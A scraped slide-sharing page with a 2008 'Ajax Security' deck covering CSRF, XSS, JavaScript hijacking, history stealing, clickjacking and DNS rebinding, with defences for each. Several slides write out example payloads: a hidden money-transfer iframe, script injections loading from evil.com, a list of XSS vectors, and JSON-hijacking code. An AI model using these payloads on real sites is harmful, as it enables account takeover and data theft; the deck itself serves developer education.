JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 

Similar to Ajax Security (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 

Recently uploaded

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataSafe Software
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?SANGHEE SHIN
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIUdaiappa Ramachandran
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 

Recently uploaded (20)

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AI
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 

Ajax Security

  • 1. Ajax Security Keeping your application safe Joe Walker Copyright SitePen, Inc. 2008. All Rights Reserved
  • 2. 89 out of 10 Websites have serious vulnerabilities Copyright SitePen, Inc. 2008. All Rights Reserved
  • 3. Goal: Keep the bad guys out of your website Copyright SitePen, Inc. 2008. All Rights Reserved
  • 4. The Attackers Who is the attacker? • Troublemakers / Thieves Who is the victim? • Your data / Your users / Your partners Copyright SitePen, Inc. 2008. All Rights Reserved
  • 5. Agenda CSRF, Login CSRF JavaScript Hijacking XSS History Stealing Combination Attacks Session Fixation + ADP + Clickjacking Copyright SitePen, Inc. 2008. All Rights Reserved
  • 6. CSRF (Cross Site Request Forgery) You can still abuse someone else’s cookies and headers even if you can’t read them
  • 7. Recap: Cross-Domain Rules www.bank.com www.evil.com c = document.cookie; c = document.cookie; alert(c); alert(c); /* /* Shows cookies from Shows cookies from www.bank.com www.evil.com */ */ Copyright SitePen, Inc. 2008. All Rights Reserved
  • 8. Abusing a Cookie without reading it www.bank.com www.evil.com Welcome to Bank.com Welcome to Evil.com We offer the best rates anywhere in We’ve got lots of warez to give away the world, guaranteed. Give us your for freee. Download our stuffs and money and we will look after it in then come back and get more the same way we look after little stuffs. Videoz, Warez, Codez, Mp3s baby kittens. . <iframe width=0 height=0 src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 9. CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: • <iframe src=quot;dangerous_urlquot;> • or <img src=quot;dangerous_urlquot;/> • or <script src=quot;dangerous_urlquot;> You can’t use XHR because cross-domain rules prevent the request from being sent Copyright SitePen, Inc. 2008. All Rights Reserved
  • 10. CSRF CSRF attacks are write-only (with one exception) Both GET and POST can be forged Referrer checking is not a complete fix It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens Copyright SitePen, Inc. 2008. All Rights Reserved
  • 11. CSRF - Protection Not 100% solution Force users to log off Check referrer headers (https only) Include authentication tokens The only complete in the body of EVERY request solution Copyright SitePen, Inc. 2008. All Rights Reserved
  • 12. CSRF - Protection Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc) POST means forms with hidden fields • OWASP servlet filter http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with Javascript and submit in the body Copyright SitePen, Inc. 2008. All Rights Reserved
  • 13. Login CSRF (Tricking someone into thinking they are you) CSRF turned inside out
  • 14. Login CSRF If I can make your browser do things behind your back, how about logging you out of some service and back in as me. What are the possibilities when you think that you are you, but you’re not; you’re me? Copyright SitePen, Inc. 2008. All Rights Reserved
  • 15. Login CSRF - Attacks What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc Copyright SitePen, Inc. 2008. All Rights Reserved
  • 16. Login CSRF - Defense If submitting over https: use Referrer checking • Do not assume no referrer is safe Use authentication tokens in your login form Watch out for session fixation attacks • Invalidate the server session on login and re-create it Copyright SitePen, Inc. 2008. All Rights Reserved
  • 17. JavaScript Hijacking (or how your GMail contacts were at risk) Sucking data out of Objects before they’re created
  • 18. JavaScript Hijacking “CSRF is write-only with one known exception” Using <script> automatically evaluates the returned script So if you can just find a way to intercept scripts as they are evaluated ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 19. <script type=quot;text/javascriptquot;> function Object() { alert(quot;Hello, Worldquot;); } var x = {}; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 20. <script type=quot;text/javascriptquot;> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = quot;Hello, Worldquot;; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 21. <script type=quot;text/javascriptquot;> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout(quot;obj['killme']='ignored';quot;, 0); } </script> <script src=quot;http://example.com/data-service/quot;> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 22. JavaScript Hijacking When you serve JavaScript from a website it could be evaluated in a hostile environment Protect secrets in JavaScript in the same way that you would protect them elsewhere Copyright SitePen, Inc. 2008. All Rights Reserved
  • 23. JavaScript Hijacking Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don’t do this) while(true); <JSON_HERE> (Google) throw new Error(quot;quot;); <JSON_HERE> (DWR) {}&& <JSON_HERE> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 24. XSS (Cross Site Scripting) Abusing someone’s trust in your typing
  • 25. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 26. XSS 2 types: • Reflected: Script embedded in the request is ‘reflected’ in the response • Stored: Attacker’s input is stored and played back in later page views Copyright SitePen, Inc. 2008. All Rights Reserved
  • 27. XSS Scenario: You let the user enter their name Someone is going to enter their name like this: Joe<script src=quot;http://evil.com/danger.jsquot;> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc Copyright SitePen, Inc. 2008. All Rights Reserved
  • 28. XSS - Making User Input Safe So, you filter out ‘<script.*>’ and then you’re safe. Right? Copyright SitePen, Inc. 2008. All Rights Reserved
  • 29. XSS - Places that scripts get eval()ed 1. <table background=quot;javascript:danger()quot;> 14.<body background=quot;javascript:danger()quot;> 2. <input type='image' src='javascript:danger()'/> 15.<div onscroll='danger()'> 3. <object type=quot;text/x-scriptletquot; 16.<div onmouseenter='danger()'> data=quot;evil.com/danger.jsquot;> 17.<style> 4. <img src='javascript:danger()'/> @import evil.com/danger.js</style> 5. <frameset> 18.<style>BODY{-moz-binding:url( <frame src=quot;javascript:danger()quot;> quot;http://evil.com/danger.js#xssquot; )}</style> 6. <link rel=quot;stylesheetquot; href=quot;javascript:danger()quot;/> 19.<xss style=quot;behavior:url(danger.htc);quot;> 7. <base href=quot;javascript:danger()quot;> 20.<div style=quot;background-image: 8. <meta http-equiv=quot;refreshquot; url(javascript:danger())quot;> content=quot;0;url=javascript:danger()quot;> 21.<div style=quot;width: 9. <p style='background-image: expression(danger());quot;> url(quot;javascript:danger()quot;)'); 22.<xss style=quot;xss:expression(danger())quot;> 10.<a href='javascript:danger()'> 11.<tr background=quot;javascript:danger()quot;> Many more 12.<body onload='danger()'> http://ha.ckers.org/xss.html 13.<div onmouseover='danger()'> Copyright SitePen, Inc. 2008. All Rights Reserved
  • 30. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot; link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 31. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot;>link makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 32. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.html >link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 33. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href=quot;a.htmlquot;¾link¼/a¾ makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 34. XSS - Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these Copyright SitePen, Inc. 2008. All Rights Reserved
  • 35. XSS - The Heart of the Problem “Be conservative in what you do; be liberal in what you accept from others” Postel’s Law Copyright SitePen, Inc. 2008. All Rights Reserved
  • 36. XSS - The Heart of the Problem In + A Out B Copyright SitePen, Inc. 2008. All Rights Reserved
  • 37. The web developers get lazy ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 38. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 39. The users like the new browser ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 40. The web developers get even lazier ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 41. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 42. The users like the new browser even more ... Copyright SitePen, Inc. 2008. All Rights Reserved
  • 43. XSS - The Heart of the Problem ¼STYLE¾@import'javas cri pt:danger()';¼/STYLE¾ Copyright SitePen, Inc. 2008. All Rights Reserved
  • 44. XSS - Protection (HTML is Illegal) 1. Filter inputs by white-listing input characters • Remember to filter header names and values 2. Filter outputs for the destination environment For HTML: < &lt; > &gt; ' &apos; quot; &quot; & &amp; For JavaScript Strings (but see later): ' ' quot; quot; LF n CR r * uXXXX Other environments have other special chars Copyright SitePen, Inc. 2008. All Rights Reserved
  • 45. XSS - Protection (well-formed HTML is legal) 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags. e.g.: • &lt;strong&gt; <strong> 5. Take extra care over attributes: • &lta href=&quot;([^&]*)&quot;/&gt; <a href=quot;$1quot;/> 6. Take great care over regular expressions Copyright SitePen, Inc. 2008. All Rights Reserved
  • 46. XSS - Protection (malformed HTML is legal) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes Copyright SitePen, Inc. 2008. All Rights Reserved
  • 47. There is NO WAY to protect against some injection points Copyright SitePen, Inc. 2008. All Rights Reserved
  • 48. XSS - Injection Points Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value=quot;$quot;> (but take care) • Javascript string values: <script>str = quot;$quot;;</script> (but take care) Anything else is likely to be unsafe Copyright SitePen, Inc. 2008. All Rights Reserved
  • 49. XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style=quot;$quot;>... • <div background=quot;$quot;> • <img src=quot;$quot;> • etc If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole Copyright SitePen, Inc. 2008. All Rights Reserved
  • 50. XSS Tricks: Comment Power-up Copyright SitePen, Inc. 2008. All Rights Reserved
  • 51. XSS - Comment Power-up Commonly reflected attacks have length restrictions How to create space for an injection attack • Use ‘<script>/*’ in an restricted unprotected field and ‘*/’ in a later unrestricted protected field Copyright SitePen, Inc. 2008. All Rights Reserved
  • 52. XSS - Summary For data input: • Restrict allowed characters for destination type For data output: • Escaped for the destination environment • Ensure encoding is specified (e.g. UTF-8) Allow inject only into known safe points Never assume that a hole is too small to jump through Copyright SitePen, Inc. 2008. All Rights Reserved
  • 53. History Stealing I know where you’ve been, parts 1, 2, 3
  • 54. History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer Copyright SitePen, Inc. 2008. All Rights Reserved
  • 55. History Stealing - Part 2 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server Copyright SitePen, Inc. 2008. All Rights Reserved
  • 56. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src=quot;http://mail.google.com/mailquot;> http://ha.ckers.org/weird/javascript-website-login-checker.html Copyright SitePen, Inc. 2008. All Rights Reserved
  • 57. History Stealing - Part 3 A page can quickly check thousands of sites and find where you bank and store your email A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links sends links back • Page checks and follows a click-stream Copyright SitePen, Inc. 2008. All Rights Reserved
  • 58. Combination Attacks Small holes don’t add up, they multiply up
  • 59. Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  • 60. Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  • 61. Clickjacking When the page you are looking at is not the page you think you are looking at
  • 62. Clickjacking - Protection if (window.top != window) { document.body.style.display = quot;nonequot;; } Copyright SitePen, Inc. 2008. All Rights Reserved
  • 63. ADP = Anti DNS Pinning Moving intranet servers into your domain
  • 64. Anti-DNS Pinning DNS for evil.com 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 65. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Let’s visit evil.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 66. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 67. Anti-DNS Pinning DNS for evil.com You need 1.2.3.4 (timeout = 1 sec) 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 68. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have http://evil.com? 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 69. Anti-DNS Pinning HTML + DNS for evil.com JavaScript that creates an iframe 2 seconds after 1.2.3.4 the page has loaded 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 70. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Time passes (2 seconds) 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 71. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 72. Anti-DNS Pinning DNS for evil.com You need 10.0.0.1 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 73. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have 10.0.0.1 http://evil.com/blah? Copyright SitePen, Inc. 2008. All Rights Reserved
  • 74. Anti-DNS Pinning DNS for evil.com 1.2.3.4 This web server is really http://intranet.corp.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 75. Anti-DNS Pinning Outer frame reads DNS for evil.com text from inner iframe and sends it back to 1.2.3.4 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 76. Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts DNS round-robin forces re-query of DNS if website appears to be down So websites can get around pins by firewalling themselves thus appearing to be down Copyright SitePen, Inc. 2008. All Rights Reserved
  • 77. Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: Cookie protected resources are safe (for now) But it’s great for Intranet hacking No cookies needed to read from 192.168.0.1 or 127.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  • 78. Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe Copyright SitePen, Inc. 2008. All Rights Reserved
  • 79. Web 2.0 Hacking Everything has a down side
  • 80. Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow Copyright SitePen, Inc. 2008. All Rights Reserved
  • 81. More Information Copyright SitePen, Inc. 2008. All Rights Reserved
  • 82. Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 83. Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCooikes - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP General: • Paros - Filtering Proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE Copyright SitePen, Inc. 2008. All Rights Reserved